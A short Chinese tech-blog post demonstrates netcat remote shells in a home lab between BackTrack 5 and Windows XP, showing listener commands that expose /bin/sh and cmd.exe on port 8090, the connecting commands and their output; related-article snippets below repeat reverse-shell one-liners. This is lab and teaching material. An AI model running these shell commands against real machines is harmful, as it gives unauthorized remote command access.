netcat获得反向shell

最新推荐文章于 2024-06-15 11:43:50 发布
最新推荐文章于 2024-06-15 11:43:50 发布
阅读量3.9k 收藏
点赞数
分类专栏: Reverse Shell backtrack netcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9259359
版权

netcat下载地址:http://sourceforge.net/projects/netcat/?source=navbar

在BT5上:

root@bt:~# nc -l -p 8090 -e /bin/sh

在XP上: 

E:\>nc 192.168.1.11 8090
ls
Desktop
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:8f:6e:f9
          inet addr:192.168.1.11  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe8f:6ef9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:191926 errors:0 dropped:0 overruns:0 frame:0
          TX packets:190831 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:12197170 (12.1 MB)  TX bytes:11565866 (11.5 MB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:114541 errors:0 dropped:0 overruns:0 frame:0
          TX packets:114541 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:26430568 (26.4 MB)  TX bytes:26430568 (26.4 MB)


然后在XP上:

E:\黑客\工具\netcat>nc -l -p 8090 -e C:\WINDOWS\system32\cmd.exe

在BT5上: 

root@bt:~# nc 192.168.1.109 8090
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

E:\黑客\工具\netcat>dir
dir
 驱动器 E 中的卷是 本地磁盘
 卷的序列号是 EC10-1C79

 E:\黑客\工具\netcat 的目录

2013-07-06  17:16    <DIR>          .
2013-07-06  17:16    <DIR>          ..
2004-12-29  13:07            61,440 nc.exe
2013-07-06  16:44            75,267 nc110.tgz
2013-07-06  13:52    <DIR>          nc111nt
2013-01-04  20:58           106,923 nc111nt.zip
2013-07-06  16:58           398,872 netcat-0.7.1.tar.gz
2013-04-09  21:06           439,215 netcat.rar
               5 个文件      1,081,717 字节
               3 个目录  4,692,963,328 可用字节

E:\黑客\工具\netcat>

比较了一下,在XP上获得bash后,前面没有shell提示符,但是在bt5上获得cmdshell,却能获得提示符。

feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
netcat使用及反弹shell
Bu2n的博客
02-20 5139
内网渗透之Linux反弹shell(综合)
墨鱼菜鸡
09-10 1364
目录 知识点 Linux mkfifo命令基本用法 1.首先了解linux命令执行顺序 2.然后了解下管道命令(pipe) 3.常见管道命令 4.mkfifo则可以创建命名管道 Linux标准文件描述符 更改标准输出的位置 更改标准输入的位置 /dev/null 重定向 输入重定向 输出重定向 管道 环境 01NC正向Sh...
反向shell
m0_52011198的博客
02-20 459
反向shell是从被感染机器上发起一个连接,它提供攻击者shell访问被感染机器的权限。反向shell或者作为一个单独的恶意代码存在,或者作为一个复杂后门程序中的组件而存在。反向shell的工作方式是远程计算机将自己的shell发送给特定的用户,而不是将shell绑定到一个端口上。后者在很多环境中是无法访问的。这样,你就可以对远程服务器执行root命令。
高级黑客技术-5. 反向ShellShell
最新发布
jennycisp的博客
06-15 810
❝本指南提供了多种方法来建立反向Shell,包括使用加密和明文方式,适用于不同的场景和需求。通过这些技术,安全专家和合法授权的渗透测试者可以有效地控制远程系统,进行安全测试和漏洞评估。gs-netcat 提供加密的反向Shell,支持文件传输和管理员登录警报。Bash 和 cURL 方法允许通过简单的命令行工具建立连接。OpenSSL 和 remote.moe 提供了加密通道,增强了数据传输的安全性。
反弹shell初识
无痕的博客
11-01 3997
反弹shell的指令与演示
NC反弹shell的几种方法
qq_59350385的博客
05-12 9653
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash
内网渗透(二)——连接shell、NC网络数据传输
qq_61562251的博客
12-10 1454
一、连接shellwebshell的定义:web下的执行环境,shell是用于与操作系统进行交互的用户界面在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,比如:硬件设备有防火墙、入侵检测系统、网站防火墙、端口被占用、权限不足等,一旦被防火墙拦截导致打草惊蛇、后期攻击相当繁琐。而被控制端主动向外发送的数据包通常都不会被拦截。二、反向shell1、工具:nc(netcat)nc,也称为netcat,是一款功能强大的网络工具,可以在网络上进行数据传输。
Reverse-Shell-Client:反向外壳客户端是netcat反向外壳侦听器的基于Python的替代方案
05-08
默认的反向Shell客户端( rsh-client.py )附带了许多功能,例如在您设法获得Shell的(基于Unix的)远程主机上上传,下载,执行和编辑文件。 您还可以下载独立版本( rsh-client-standalone.py ),这是一个较小的...
rsh:从CLI为Linux和Windows生成反向Shell
02-01
产品特点使用此工具,您可以轻松地使用以下语言快速生成Linux和Windows支持的反向Shell命令: 重击Bash反向壳网猫网猫OpenBSD 非传统PythonIPv4 IPv6 RubyPerlPHP 电源外壳节点JS TCSH Awk Java用法usage: rsh [-h] ...
EmbeddedNetcatReverseShell:将 netcat 嵌入到程序中并让它在运行时发送反向 shell 请求
06-14
EmbeddedNetcatReverseShell 尝试将 netcat 嵌入到程序中并让它在运行时发送反向 shell 请求。 将 netcat.exe 嵌入到我制作的掷骰子的 C# 程序中的一个非常简单的概念证明。 在运行掷骰子时,程序会创建一个 ...
linux-一个简单的脚本可自动生成OpenSSL反向shell
08-13
脚本的运作原理通常是这样的:首先,它会使用OpenSSL的`ncat`或`netcat`工具生成一个反向shell命令,然后通过网络发送到指定的IP地址和端口。OpenSSL的`s_client`或`s_server`命令可以用于建立安全的网络连接,而`-e...
32+64位socat,Android版,arm+arm64,android手机可用,android反向shell工具
04-16
android反向shell工具。 本zip包含socat arm版本 和 arm64版本,可以push到android设备运行。 例如: adb push socat /data/local/tmp/ adb shell cd /data/local/tmp/ /socat -d TCP4-LISTEN:10001,fork EXEC:/...
渗透中的Shell
2301_77004573的博客
10-17 296
用最简单的术语来说,shell是我们在与命令行环境(CLI)接口时使用的。换句话说,Linux中常见的bash或sh程序是shell的例子,Windows上的cmd.exe和Powershell也是如此。当面向远程系统时,有时可以强制在服务器上运行的应用程序(例如 Web 服务器)执行任意代码。发生这种情况时,我们希望使用此初始访问权限来获取在目标上运行的 shell。反弹shell:我们可以强制远程服务器向我们发送对服务器的命令行访问。
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 1342
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
渗透测试-window反弹shell
lza20001103的博客
05-11 4301
window反弹shell
【渗透测试笔记】之【内网渗透——传输层隧道(nc的使用:nc的正反向shell、bash(1)
2401_84969775的博客
05-13 374
(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)目录,ubuntu是。
使用netcat的正向 / 反向shell
weixin_33720078的博客
01-08 1179
reverse shell bind shell reverse shell描述图: 在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用...
反弹Shell方法论,Windows篇
大河之犬的博客
10-10 783
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
内网渗透:nc反弹shell总结
安全大白
01-03 6478
1、实验环境 Kali:192.168.32.132 //模拟靶机 Windows:192.168.32.1 //模拟公网vps 2、若靶机上存在nc,获取反向shell: vps攻击机:nc -lvp 9999 // 监听9999端口 靶机:nc 1.1.1.1 9999 -e /bin/bash // Linux正向连接公网vps1.1.1.1的9999端口 nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe // Windows 3、若
反向shell连接到目标主机
06-10
2. 在攻击者的机器上,使用一个工具(如netcat)向目标主机发送一个连接请求,同时将一个反向shell的命令作为参数传递给监听程序。 3. 监听程序接收到连接请求后,会执行反向shell命令,并将一个shell会话返回给攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值